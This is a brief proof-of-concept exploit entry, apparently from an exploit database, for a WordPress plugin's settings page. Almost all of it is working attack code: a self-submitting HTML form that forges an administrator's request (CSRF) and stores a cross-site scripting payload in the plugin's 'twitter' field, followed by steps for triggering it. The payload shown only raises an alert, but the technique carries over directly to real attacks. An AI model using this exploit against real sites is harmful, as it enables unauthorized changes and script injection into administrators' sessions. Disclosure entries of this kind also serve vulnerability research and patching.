## https://sploitus.com/exploit?id=WPEX-ID:93FAAD5B-E1E8-4E49-B19E-B91343D68B51
Create an HTML file with the following content and have a logged in admin access it:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/options-general.php?page=subscribers_text_counter" method="POST">
<input type="text" name="twitter" value='"><svg/onload=alert(2);>'>
<input type="text" name="stextcount_hidden" value="settings">
<input type="submit" value="submit">
</form>
</body>
```
Navigate to the plugin's settings to trigger the XSS.